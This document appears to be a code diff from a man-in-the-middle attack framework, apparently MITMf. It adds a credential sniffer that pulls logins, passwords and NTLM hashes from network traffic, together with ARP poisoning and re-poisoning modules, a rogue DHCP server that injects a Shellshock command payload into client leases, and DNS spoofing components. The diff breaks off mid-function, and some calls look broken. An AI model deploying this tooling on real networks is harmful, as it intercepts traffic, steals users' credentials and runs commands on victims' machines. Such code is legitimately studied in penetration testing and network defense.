+        ntlm_resp_found = parse_ntlm_resp(NTLMSSP3.group(), seq)
+        if ntlm_resp_found != None:
+            printer(src_ip_port, dst_ip_port, ntlm_resp_found)
+
+    # Look for authentication headers
+    if len(headers) == 0:
+        authenticate_header = None
+        authorization_header = None
+    for header in headers:
+        authenticate_header = re.match(authenticate_re, header)
+        authorization_header = re.match(authorization_re, header)
+        if authenticate_header or authorization_header:
+            break
+
+    if authorization_header or authenticate_header:
+        # NETNTLM
+        netntlm_found = parse_netntlm(authenticate_header, authorization_header, headers, ack, seq)
+        if netntlm_found != None:
+            printer(src_ip_port, dst_ip_port, netntlm_found)
+
+        # Basic Auth
+        parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header)
+
+def get_http_searches(http_url_req, body, host):
+    '''
+    Find search terms from URLs. Prone to false positives but rather err on that side than false negatives
+    search, query, ?s, &q, ?q, search?p, searchTerm, keywords, command
+    '''
+    false_pos = ['i.stack.imgur.com']
+
+    searched = None
+    if http_url_req != None:
+        searched = re.search(http_search_re, http_url_req, re.IGNORECASE)
+        if searched == None:
+            searched = re.search(http_search_re, body, re.IGNORECASE)
+
+    if searched != None and host not in false_pos:
+        searched = searched.group(3)
+        # Eliminate some false+
+        try:
+            # if it doesn't decode to utf8 it's probably not user input
+            searched = searched.decode('utf8')
+        except UnicodeDecodeError:
+            return
+        # some add sites trigger this function with single digits
+        if searched in [str(num) for num in range(0,10)]:
+            return
+        # nobody's making >100 character searches
+        if len(searched) > 100:
+            return
+        msg = 'Searched %s: %s' % (host, unquote(searched.encode('utf8')).replace('+', ' '))
+        return msg
+
+def parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header):
+    '''
+    Parse basic authentication over HTTP
+    '''
+    if authorization_header:
+        # authorization_header sometimes is triggered by failed ftp
+        try:
+            header_val = headers[authorization_header.group()]
+        except KeyError:
+            return
+        b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE)
+        if b64_auth_re != None:
+            basic_auth_b64 = b64_auth_re.group(1)
+            basic_auth_creds = base64.decodestring(basic_auth_b64)
+            msg = 'Basic Authentication: %s' % basic_auth_creds
+            printer(src_ip_port, dst_ip_port, msg)
+
+def parse_netntlm(authenticate_header, authorization_header, headers, ack, seq):
+    '''
+    Parse NTLM hashes out
+    '''
+    # Type 2 challenge from server
+    if authenticate_header != None:
+        chal_header = authenticate_header.group()
+        parse_netntlm_chal(headers, chal_header, ack)
+
+    # Type 3 response from client
+    elif authorization_header != None:
+        resp_header = authorization_header.group()
+        msg = parse_netntlm_resp_msg(headers, resp_header, seq)
+        if msg != None:
+            return msg
+
+def parse_snmp(src_ip_port, dst_ip_port, snmp_layer):
+    '''
+    Parse out the SNMP version and community string
+    '''
+    if type(snmp_layer.community.val) == str:
+        ver = snmp_layer.version.val
+        msg = 'SNMPv%d community string: %s' % (ver, snmp_layer.community.val)
+        printer(src_ip_port, dst_ip_port, msg)
+    return True
+
+def get_http_url(method, host, path, headers):
+    '''
+    Get the HTTP method + URL from requests
+    '''
+    if method != None and path != None:
+
+        # Make sure the path doesn't repeat the host header
+        if host != '' and not re.match('(http(s)?://)?'+host, path):
+            http_url_req = method + ' ' + host + path
+        else:
+            http_url_req = method + ' ' + path
+
+        http_url_req = url_filter(http_url_req)
+
+        return http_url_req
+
+def headers_to_dict(header_lines):
+    '''
+    Convert the list of header lines into a dictionary
+    '''
+    headers = {}
+    # Incomprehensible list comprehension flattens list of headers
+    # that are each split at ': '
+    # http://stackoverflow.com/a/406296
+    headers_list = [x for line in header_lines for x in line.split(': ', 1)]
+    headers_dict = dict(zip(headers_list[0::2], headers_list[1::2]))
+    # Make the header key (like "Content-Length") lowercase
+    for header in headers_dict:
+        headers[header.lower()] = headers_dict[header]
+
+    return headers
+
+def parse_http_line(http_line, http_methods):
+    '''
+    Parse the header with the HTTP method in it
+    '''
+    http_line_split = http_line.split()
+    method = ''
+    path = ''
+
+    # Accounts for pcap files that might start with a fragment
+    # so the first line might be just text data
+    if len(http_line_split) > 1:
+        method = http_line_split[0]
+        path = http_line_split[1]
+
+    # This check exists because responses are much different than requests e.g.:
+    #     HTTP/1.1 407 Proxy Authentication Required ( Access is denied.  )
+    # Add a space to method because there's a space in http_methods items
+    # to avoid false+
+    if method+' ' not in http_methods:
+        method = None
+        path = None
+
+    return method, path
+
+def parse_http_load(full_load, http_methods):
+    '''
+    Split the raw load into list of headers and body string
+    '''
+    try:
+        headers, body = full_load.split("\r\n\r\n", 1)
+    except ValueError:
+        headers = full_load
+        body = ''
+    header_lines = headers.split("\r\n")
+
+    # Pkts may just contain hex data and no headers in which case we'll
+    # still want to parse them for usernames and password
+    http_line = get_http_line(header_lines, http_methods)
+    if not http_line:
+        headers = ''
+        body = full_load
+
+    header_lines = [line for line in header_lines if line != http_line]
+
+    return http_line, header_lines, body
+
+def get_http_line(header_lines, http_methods):
+    '''
+    Get the header with the http command
+    '''
+    for header in header_lines:
+        for method in http_methods:
+            # / is the only char I can think of that's in every http_line
+            # Shortest valid: "GET /", add check for "/"?
+            if header.startswith(method):
+                http_line = header
+                return http_line
+
+def parse_netntlm_chal(headers, chal_header, ack):
+    '''
+    Parse the netntlm server challenge
+    https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py
+    '''
+    try:
+        header_val2 = headers[chal_header]
+    except KeyError:
+        return
+    header_val2 = header_val2.split(' ', 1)
+    # The header value can either start with NTLM or Negotiate
+    if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate':
+        msg2 = header_val2[1]
+        msg2 = base64.decodestring(msg2)
+        parse_ntlm_chal(ack, msg2)
+
+def parse_ntlm_chal(msg2, ack):
+    '''
+    Parse server challenge
+    '''
+    global challenge_acks
+
+    Signature = msg2[0:8]
+    try:
+        msg_type = struct.unpack("<I",msg2[8:12])[0]
+    except Exception:
+        return
+    assert(msg_type==2)
+    ServerChallenge = msg2[24:32].encode('hex')
+
+    # Keep the dict of ack:challenge to less than 50 chals
+    if len(challenge_acks) > 50:
+        challenge_acks.popitem(last=False)
+    challenge_acks[ack] = ServerChallenge
+
+def parse_netntlm_resp_msg(headers, resp_header, seq):
+    '''
+    Parse the client response to the challenge
+    '''
+    try:
+        header_val3 = headers[resp_header]
+    except KeyError:
+        return
+    header_val3 = header_val3.split(' ', 1)
+
+    # The header value can either start with NTLM or Negotiate
+    if header_val3[0] == 'NTLM' or header_val3[0] == 'Negotiate':
+        try:
+            msg3 = base64.decodestring(header_val3[1])
+        except binascii.Error:
+            return
+        return parse_ntlm_resp(msg3, seq)
+
+def parse_ntlm_resp(msg3, seq):
+    '''
+    Parse the 3rd msg in NTLM handshake
+    Thanks to psychomario
+    '''
+
+    if seq in challenge_acks:
+        challenge = challenge_acks[seq]
+    else:
+        challenge = 'CHALLENGE NOT FOUND'
+
+    if len(msg3) > 43:
+        # Thx to psychomario for below
+        lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44])
+        lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen])
+        nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen])
+        domain = msg3[domoff:domoff+domlen].replace("\0", "")
+        user = msg3[useroff:useroff+userlen].replace("\0", "")
+        # Original check by psychomario, might be incorrect?
+        #if lmhash != "0"*48: #NTLMv1
+        if ntlen == 24: #NTLMv1
+            msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge)
+            return msg
+        elif ntlen > 60: #NTLMv2
+            msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:])
+            return msg
+
+def url_filter(http_url_req):
+    '''
+    Filter out the common but uninteresting URLs
+    '''
+    if http_url_req:
+        d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff']
+        if any(http_url_req.endswith(i) for i in d):
+            return
+
+    return http_url_req
+
+def get_login_pass(body):
+    '''
+    Regex out logins and passwords from a string
+    '''
+    user = None
+    passwd = None
+
+    # Taken mainly from Pcredz by Laurent Gaffie
+    userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
+                  'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
+                  'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
+                  'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
+                  'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in']
+    passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword', 
+                  'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
+                  'passwort', 'passwrd', 'wppassword', 'upasswd']
+
+    for login in userfields:
+        login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE)
+        if login_re:
+            user = login_re.group()
+    for passfield in passfields:
+        pass_re = re.search('(%s=[^&]+)' % passfield, body, re.IGNORECASE)
+        if pass_re:
+            passwd = pass_re.group()
+
+    if user and passwd:
+        return (user, passwd)
+
+def printer(src_ip_port, dst_ip_port, msg):
+    if dst_ip_port != None:
+        print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg)
+        # All credentials will have dst_ip_port, URLs will not
+
+        mitmf_logger.info("[NetCreds] {}".format(print_str))
+    else:
+        print_str = '[{}] {}'.format(src_ip_port.split(':')[0], msg)
+        mitmf_logger.info("[NetCreds] {}".format(print_str))

core/netcreds/README.md

@@ -0,0 +1,64 @@
+Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification. 
+
+| Screenshots |
+|:-----:|
+| ![Screenie1](http://imgur.com/opQo7Bb.png) |
+| ![Screenie2](http://imgur.com/Kl5I6Ju.png) |
+
+###Sniffs
+
+* URLs visited
+* POST loads sent
+* HTTP form logins/passwords
+* HTTP basic auth logins/passwords
+* HTTP searches
+* FTP logins/passwords
+* IRC logins/passwords
+* POP logins/passwords
+* IMAP logins/passwords
+* Telnet logins/passwords
+* SMTP logins/passwords
+* SNMP community string
+* NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc
+* Kerberos
+
+
+###Examples
+
+Auto-detect the interface to sniff
+
+```sudo python net-creds.py```
+
+Choose eth0 as the interface
+
+```sudo python net-creds.py -i eth0```
+
+Ignore packets to and from 192.168.0.2
+
+```sudo python net-creds.py -f 192.168.0.2```
+
+Read from pcap
+
+```python net-creds.py -p pcapfile```
+
+
+####OSX
+
+Credit to [epocs](https://github.com/epocs):
+```
+sudo easy_install pip
+sudo pip install scapy
+sudo pip install pcapy
+brew install libdnet --with-python
+mkdir -p /Users/<username>/Library/Python/2.7/lib/python/site-packages
+echo 'import site; site.addsitedir("/usr/local/lib/python2.7/site-packages")' >> /Users/<username>/Library/Python/2.7/lib/python/site-packages/homebrew.pth
+sudo pip install pypcap
+brew tap brona/iproute2mac
+brew install iproute2mac
+```
+Then replace line 74 '/sbin/ip' with '/usr/local/bin/ip'.
+
+
+####Thanks
+* Laurent Gaffie
+* psychomario

core/protocols/arp/ARPWatch.py

@@ -0,0 +1,86 @@
+import logging
+import os
+import sys
+import threading
+
+from scapy.all import *
+
+mitmf_logger = logging.getLogger('mitmf')
+
+class ARPWatch:
+
+    def __init__(self, gatewayip, myip, interface):
+        self.gatewayip  = gatewayip
+        self.gatewaymac = None
+        self.myip       = myip
+        self.interface  = interface
+        self.debug      = False
+        self.watch      = True
+
+    def start(self):
+        try:
+            self.gatewaymac = getmacbyip(self.gatewayip)
+            if self.gatewaymac is None:
+                sys.exit("[ARPWatch] Error: Could not resolve gateway's MAC address")
+        except Exception, e:
+            sys.exit("[ARPWatch] Exception occured while resolving gateway's MAC address: {}".format(e))
+
+        mitmf_logger.debug("[ARPWatch] gatewayip  => {}".format(self.gatewayip))
+        mitmf_logger.debug("[ARPWatch] gatewaymac => {}".format(self.gatewaymac))
+        mitmf_logger.debug("[ARPWatch] myip       => {}".format(self.myip))
+        mitmf_logger.debug("[ARPWatch] interface  => {}".format(self.interface))
+
+        t = threading.Thread(name='ARPWatch', target=self.startARPWatch)
+        t.setDaemon(True)
+        t.start()
+
+    def stop(self):
+        mitmf_logger.debug("[ARPWatch] shutting down")
+        self.watch = False
+
+    def startARPWatch(self):
+        sniff(prn=self.arp_monitor_callback, filter="arp", store=0)
+
+    def arp_monitor_callback(self, pkt):
+        if self.watch is True: #Prevents sending packets on exiting
+            if ARP in pkt and pkt[ARP].op == 1: #who-has only
+                #broadcast mac is 00:00:00:00:00:00
+                packet = None
+                #print str(pkt[ARP].hwsrc) #mac of sender
+                #print str(pkt[ARP].psrc) #ip of sender
+                #print str(pkt[ARP].hwdst) #mac of destination (often broadcst)
+                #print str(pkt[ARP].pdst) #ip of destination (Who is ...?)
+
+                if (str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and str(pkt[ARP].pdst) == self.gatewayip and self.myip != str(pkt[ARP].psrc)):
+                    mitmf_logger.debug("[ARPWatch] {} is asking where the Gateway is. Sending reply: I'm the gateway biatch!'".format(pkt[ARP].psrc))
+                    #send repoison packet
+                    packet = ARP()
+                    packet.op = 2
+                    packet.psrc = self.gatewayip
+                    packet.hwdst = str(pkt[ARP].hwsrc)
+                    packet.pdst = str(pkt[ARP].psrc)
+
+                elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip != str(pkt[ARP].pdst)):
+                    mitmf_logger.debug("[ARPWatch] Gateway asking where {} is. Sending reply: I'm {} biatch!".format(pkt[ARP].pdst, pkt[ARP].pdst))
+                    #send repoison packet
+                    packet = ARP()
+                    packet.op = 2
+                    packet.psrc = self.gatewayip
+                    packet.hwdst = '00:00:00:00:00:00'
+                    packet.pdst = str(pkt[ARP].pdst)
+
+                elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip == str(pkt[ARP].pdst)):    
+                    mitmf_logger.debug("[ARPWatch] Gateway asking where {} is. Sending reply: This is the h4xx0r box!".format(pkt[ARP].pdst))
+
+                    packet = ARP()
+                    packet.op = 2
+                    packet.psrc = self.myip
+                    packet.hwdst = str(pkt[ARP].hwsrc)
+                    packet.pdst = str(pkt[ARP].psrc)
+
+                try:
+                    if packet is not None:
+                        send(packet, verbose=self.debug, iface=self.interface)
+                except Exception, e:
+                    mitmf_logger.error("[ARPWatch] Error sending re-poison packet: {}".format(e))
+                    pass

core/protocols/arp/ARPpoisoner.py

@@ -0,0 +1,148 @@
+import logging
+import threading
+from time import sleep
+from scapy.all import *
+
+mitmf_logger = logging.getLogger('mitmf')
+
+class ARPpoisoner():
+
+    def __init__(self, gateway, interface, mac, targets):
+
+        self.gatewayip  = gateway
+        self.gatewaymac = getmacbyip(gateway)
+        self.mymac      = mac
+        self.targets    = self.getTargetRange(targets)
+        self.targetmac  = None
+        self.interface  = interface
+        self.arpmode    = 'rep'
+        self.debug      = False
+        self.send       = True
+        self.interval   = 3
+
+    def getTargetRange(self, targets):
+        if targets is None:
+            return None
+
+        targetList = list()
+        targets = targets.split(",")
+        for target in targets:
+            if "-" in target:
+                max_range = int(target.split("-")[1])
+                octets    = target.split("-")[0].split(".")
+                f3_octets = ".".join(octets[0:3]) 
+                l_octet   = int(octets[3])
+
+                for ip in xrange(l_octet, max_range+1):
+                    targetList.append('{}.{}'.format(f3_octets, ip))
+            else:
+                targetList.append(target)
+
+        return targetList
+
+    def start(self):
+        if self.gatewaymac is None:
+            sys.exit("[ARPpoisoner] Error: Could not resolve gateway's MAC address")
+
+        mitmf_logger.debug("[ARPpoisoner] gatewayip  => {}".format(self.gatewayip))
+        mitmf_logger.debug("[ARPpoisoner] gatewaymac => {}".format(self.gatewaymac))
+        mitmf_logger.debug("[ARPpoisoner] targets    => {}".format(self.targets))
+        mitmf_logger.debug("[ARPpoisoner] targetmac  => {}".format(self.targetmac))
+        mitmf_logger.debug("[ARPpoisoner] mymac      => {}".format(self.mymac))
+        mitmf_logger.debug("[ARPpoisoner] interface  => {}".format(self.interface))
+        mitmf_logger.debug("[ARPpoisoner] arpmode    => {}".format(self.arpmode))
+        mitmf_logger.debug("[ARPpoisoner] interval   => {}".format(self.interval))
+
+        if self.arpmode == 'rep':
+            t = threading.Thread(name='ARPpoisoner-rep', target=self.poisonARPrep)
+
+        elif self.arpmode == 'req':
+            t = threading.Thread(name='ARPpoisoner-req', target=self.poisonARPreq)
+
+        t.setDaemon(True)
+        t.start()
+
+    def stop(self):
+        self.send = False
+        sleep(3)
+        self.interval = 1
+        
+        if self.targets:
+            self.restoreTarget(2)
+
+        elif self.targets is None:
+            self.restoreNet(5)
+
+    def poisonARPrep(self):
+        while self.send:
+            
+            if self.targets is None:
+                pkt = Ether(src=self.mymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mymac, psrc=self.gatewayip, op="is-at")
+                sendp(pkt, iface=self.interface, verbose=self.debug) #sends at layer 2
+
+            elif self.targets:
+                #Since ARP spoofing relies on knowing the targets MAC address, this whole portion is just error handling in case we can't resolve it
+                for targetip in self.targets:
+                    try:
+                        targetmac = getmacbyip(targetip)
+
+                        if targetmac is None:
+                            mitmf_logger.error("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
+
+                        elif targetmac:
+                            send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="is-at"), iface=self.interface, verbose=self.debug)
+                            send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="is-at", ), iface=self.interface, verbose=self.debug)
+
+                    except Exception, e:
+                        mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
+                        pass
+
+            sleep(self.interval)
+
+    def poisonARPreq(self):
+        while self.send:
+            
+            if self.targets is None:
+                pkt = Ether(src=self.mymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mymac, psrc=self.gatewayip, op="who-has")
+                sendp(pkt, iface=self.interface, verbose=self.debug) #sends at layer 2
+
+            elif self.targets:
+                for targetip in self.targets:
+                    try:
+                        targetmac = getmacbyip(targetip)
+                        
+                        if targetmac is None:
+                            mitmf_logger.error("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
+
+                        elif targetmac:
+                            send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="who-has"), iface=self.interface, verbose=self.debug)
+                            send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="who-has"), iface=self.interface, verbose=self.debug)
+
+                    except Exception, e:
+                        mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
+                        pass
+            
+            sleep(self.interval)
+
+    def restoreNet(self, count):
+        mitmf_logger.info("[ARPpoisoner] Restoring subnet connection with {} packets".format(count))
+        pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.gatewaymac, psrc=self.gatewayip, op="is-at")
+        sendp(pkt, inter=self.interval, count=count, iface=self.interface, verbose=self.debug) #sends at layer 2
+
+    def restoreTarget(self, count):
+        for targetip in self.targets:
+            try:
+                targetmac = getmacbyip(targetip)
+                
+                if targetmac is None:
+                    mitmf_logger.error("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
+
+                elif targetmac:
+                    mitmf_logger.info("[ARPpoisoner] Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
+
+                    send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac), iface=self.interface, count=count, verbose=self.debug)
+                    send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac), iface=self.interface, count=count, verbose=self.debug)
+
+            except Exception, e:
+                mitmf_logger.error("[ARPpoisoner] Exception occurred while restoring connection {}: {}".format(targetip, e))
+                pass

core/protocols/dhcp/DHCPServer.py

@@ -0,0 +1,107 @@
+import logging
+import threading
+import binascii
+import random
+
+logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  #Gets rid of IPV6 Error when importing scapy
+from scapy.all import *
+
+mitmf_logger = logging.getLogger('mitmf')
+
+class DHCPServer():
+
+	def __init__(self, interface, dhcpcfg, ip, mac):
+		self.interface   = interface
+		self.ip_address  = ip
+		self.mac_address = mac
+		self.shellshock  = None
+		self.debug       = False
+		self.dhcpcfg     = dhcpcfg
+		self.rand_number = []
+		self.dhcp_dic    = {}
+
+	def start(self):
+		t = threading.Thread(name="dhcp_spoof", target=self.dhcp_sniff, args=(self.interface,))
+		t.setDaemon(True)
+		t.start()
+
+	def dhcp_sniff(self, interface):
+		sniff(filter="udp and (port 67 or 68)", prn=self.dhcp_callback, iface=interface)
+
+	def dhcp_rand_ip(self):
+		pool = self.dhcpcfg['ip_pool'].split('-')
+		trunc_ip = pool[0].split('.'); del(trunc_ip[3])
+		max_range = int(pool[1])
+		min_range = int(pool[0].split('.')[3])
+		number_range = range(min_range, max_range)
+		for n in number_range:
+			if n in self.rand_number:
+				number_range.remove(n)
+		rand_number = random.choice(number_range)
+		self.rand_number.append(rand_number)
+		rand_ip = '.'.join(trunc_ip) + '.' + str(rand_number)
+
+		return rand_ip
+
+	def dhcp_callback(self, resp):
+		if resp.haslayer(DHCP):
+			xid = resp[BOOTP].xid
+			mac_addr = resp[Ether].src
+			raw_mac = binascii.unhexlify(mac_addr.replace(":", ""))
+			if xid in self.dhcp_dic.keys():
+				client_ip = self.dhcp_dic[xid]
+			else:
+				client_ip = self.dhcp_rand_ip()
+				self.dhcp_dic[xid] = client_ip
+
+			if resp[DHCP].options[0][1] is 1:
+				mitmf_logger.info("Got DHCP DISCOVER from: " + mac_addr + " xid: " + hex(xid))
+				mitmf_logger.info("Sending DHCP OFFER")
+				packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') /
+				IP(src=self.ip_address, dst='255.255.255.255') /
+				UDP(sport=67, dport=68) /
+				BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) /
+				DHCP(options=[("message-type", "offer"),
+					('server_id', self.ip_address),
+					('subnet_mask', self.dhcpcfg['subnet']),
+					('router', self.ip_address),
+					('lease_time', 172800),
+					('renewal_time', 86400),
+					('rebinding_time', 138240),
+					"end"]))
+
+				try:
+					packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server'])))
+				except KeyError:
+					pass
+
+				sendp(packet, iface=self.interface, verbose=self.debug)
+
+			if resp[DHCP].options[0][1] is 3:
+				mitmf_logger.info("Got DHCP REQUEST from: " + mac_addr + " xid: " + hex(xid))
+				packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') /
+				IP(src=self.ip_address, dst='255.255.255.255') /
+				UDP(sport=67, dport=68) /
+				BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) /
+				DHCP(options=[("message-type", "ack"),
+					('server_id', self.ip_address),
+					('subnet_mask', self.dhcpcfg['subnet']),
+					('router', self.ip_address),
+					('lease_time', 172800),
+					('renewal_time', 86400),
+					('rebinding_time', 138240)]))
+
+				try:
+					packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server'])))
+				except KeyError:
+					pass
+
+				if self.shellshock:
+					mitmf_logger.info("Sending DHCP ACK with shellshock payload")
+					packet[DHCP].options.append(tuple((114, "() { ignored;}; " + self.shellshock)))
+					packet[DHCP].options.append("end")
+				else:
+					mitmf_logger.info("Sending DHCP ACK")
+					packet[DHCP].options.append("end")
+
+				sendp(packet, iface=self.interface, verbose=self.debug)

core/protocols/dns/DNSServer.py

@@ -0,0 +1,101 @@
+##################################################################################
+#DNS Stuff starts here(not Used)
+##################################################################################
+
+#Function name self-explanatory
+
+class DNSServer():
+
+	def serve_thread_udp(host, port, handler):
+		try:
+			server = ThreadingUDPServer((host, port), handler)
+			server.serve_forever()
+		except Exception, e:
+			print "Error starting UDP server on port %s: %s:" % (str(port),str(e))
+
+	def start(DNS_On_Off):
+		if DNS_On_Off == "ON":
+			t1 = threading.Thread(name="DNS", target=self.serve_thread_udp, args=("0.0.0.0", 53,DNS))
+			t2 = threading.Thread(name="DNSTCP", target=self.serve_thread_udp, args=("0.0.0.0", 53,DNSTCP))
+			for t in [t1, t2]:
+				t.setDaemon(True)
+				t.start()
+
+		if DNS_On_Off == "OFF":
+			return False
+
+class ThreadingUDPServer(ThreadingMixIn, UDPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		UDPServer.server_bind(self)
+
+def ParseDNSType(data):
+	QueryTypeClass = data[len(data)-4:]
+	if QueryTypeClass == "\x00\x01\x00\x01":#If Type A, Class IN, then answer.
+		return True
+	else:
+		return False
+
+#DNS Answer packet.
+class DNSAns(Packet):
+	fields = OrderedDict([
+		("Tid",              ""),
+		("Flags",            "\x80\x10"),
+		("Question",         "\x00\x01"),
+		("AnswerRRS",        "\x00\x01"),
+		("AuthorityRRS",     "\x00\x00"),
+		("AdditionalRRS",    "\x00\x00"),
+		("QuestionName",     ""),
+		("QuestionNameNull", "\x00"),
+		("Type",             "\x00\x01"),
+		("Class",            "\x00\x01"),
+		("AnswerPointer",    "\xc0\x0c"),
+		("Type1",            "\x00\x01"),
+		("Class1",           "\x00\x01"),
+		("TTL",              "\x00\x00\x00\x1e"), #30 secs, dont mess with their cache for too long..
+		("IPLen",            "\x00\x04"),
+		("IP",               "\x00\x00\x00\x00"),
+	])
+
+	def calculate(self,data):
+		self.fields["Tid"] = data[0:2]
+		self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1])
+		self.fields["IP"] = inet_aton(OURIP)
+		self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"]))
+
+# DNS Server class.
+class DNS(BaseRequestHandler):
+
+	def handle(self):
+		data, soc = self.request
+		if self.client_address[0] == "127.0.0.1":
+			pass
+		elif ParseDNSType(data):
+			buff = DNSAns()
+			buff.calculate(data)
+			soc.sendto(str(buff), self.client_address)
+			#print "DNS Answer sent to: %s "%(self.client_address[0])
+			responder_logger.info('DNS Answer sent to: %s'%(self.client_address[0]))
+
+class DNSTCP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			data = self.request.recv(1024)
+			if self.client_address[0] == "127.0.0.1":
+				pass
+			elif ParseDNSType(data):
+				buff = DNSAns()
+				buff.calculate(data)
+				self.request.send(str(buff))
+				#print "DNS Answer sent to: %s "%(self.client_address[0])
+				responder_logger.info('DNS Answer sent to: %s'%(self.client_address[0]))
+
+		except Exception:
+			pass
+
+##################################################################################
+#DNS Stuff ends here (not Used) 
+##################################################################################

core/protocols/dns/DNSnfqueue.py

@@ -0,0 +1,130 @@
+
+class DNSnfqueue():
+
+	hsts      = False
+	dns       = False
+	hstscfg   = None
+	dnscfg    = None
+	_instance = None
+	nfqueue   = None
+	queue_number = 0
+
+	def __init__(self):
+		self.nfqueue = NetfilterQueue()
+		t = threading.Thread(name='nfqueue', target=self.bind, args=())
+		t.setDaemon(True)
+		t.start()
+
+	@staticmethod
+	def getInstance():
+		if _DNS._instance is None:
+			_DNS._instance = _DNS()
+
+		return _DNS._instance
+
+	@staticmethod
+	def checkInstance():
+		if _DNS._instance is None:
+			return False
+		else:
+			return True
+
+	def bind(self):
+		self.nfqueue.bind(self.queue_number, self.callback)
+		self.nfqueue.run()
+
+	def stop(self):
+		try:
+			self.nfqueue.unbind()
+		except:
+			pass
+
+	def enableHSTS(self, config):
+		self.hsts = True
+		self.hstscfg = config
+
+	def enableDNS(self, config):
+		self.dns = True
+		self.dnscfg = config
+
+	def resolve_domain(self, domain):
+		try:
+			mitmf_logger.debug("Resolving -> %s" % domain)
+			answer = dns.resolver.query(domain, 'A')
+			real_ips = []
+			for rdata in answer:
+				real_ips.append(rdata.address)
+
+			if len(real_ips) > 0:
+				return real_ips
+
+		except Exception:
+			mitmf_logger.info("Error resolving " + domain)
+
+	def callback(self, payload):
+		try:
+			#mitmf_logger.debug(payload)
+			pkt = IP(payload.get_payload())
+
+			if not pkt.haslayer(DNSQR):
+				payload.accept()
+				return
+
+			if pkt.haslayer(DNSQR):
+				mitmf_logger.debug("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype))
+				if self.dns:
+					for k, v in self.dnscfg.items():
+						if k in pkt[DNSQR].qname:
+							self.modify_dns(payload, pkt, v)
+							return
+
+					payload.accept()
+
+				elif self.hsts:
+					if (pkt[DNSQR].qtype is 28 or pkt[DNSQR].qtype is 1):
+						for k,v in self.hstscfg.items():
+							if v == pkt[DNSQR].qname[:-1]:
+								ip = self.resolve_domain(k)
+								if ip:
+									self.modify_dns(payload, pkt, ip)
+									return
+
+						if 'wwww' in pkt[DNSQR].qname:
+							ip = self.resolve_domain(pkt[DNSQR].qname[1:-1])
+							if ip:
+								self.modify_dns(payload, pkt, ip)
+								return
+
+						if 'web' in pkt[DNSQR].qname:
+							ip = self.resolve_domain(pkt[DNSQR].qname[3:-1])
+							if ip:
+								self.modify_dns(payload, pkt, ip)
+								return
+
+					payload.accept()
+
+		except Exception, e:
+			print "Exception occurred in nfqueue callback: " + str(e)
+
+	def modify_dns(self, payload, pkt, ip):
+		try:
+			spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\
+			UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\
+			DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd)
+
